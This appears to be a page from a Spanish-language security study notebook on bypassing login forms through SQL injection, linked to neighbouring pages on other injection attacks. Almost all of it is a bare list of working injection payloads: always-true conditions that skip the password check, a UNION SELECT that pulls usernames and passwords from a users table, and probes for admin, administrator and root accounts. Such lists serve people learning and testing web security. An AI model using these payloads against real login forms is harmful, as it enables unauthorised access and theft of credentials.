Vulnerabilidad de inyección SQL que permite eludir el inicio de sesión

LUIS' #VERIFICAR VULN
' OR 1=1-- 
' OR 'admin' = username-- 
' OR 'a' = 'a'-- 
' OR 1=1 UNION SELECT null, username, password FROM users-- 
' OR 1=1;--

Verificamos si existe el usuario:

administrator' OR 1=1--
' OR 'admin' = username-- 
' OR 'administrator' = username-- 
' OR 'root' = username-- 
' OR 'admin' = username;--

PreviousVulnerabilidad de Inyección SQL en la Cláusula WHERE en Filtro de Categorías de Productos NextAtaque de inyección SQL, consultando el tipo y la versión de la base de datos en Oracle

Last updated 1 day ago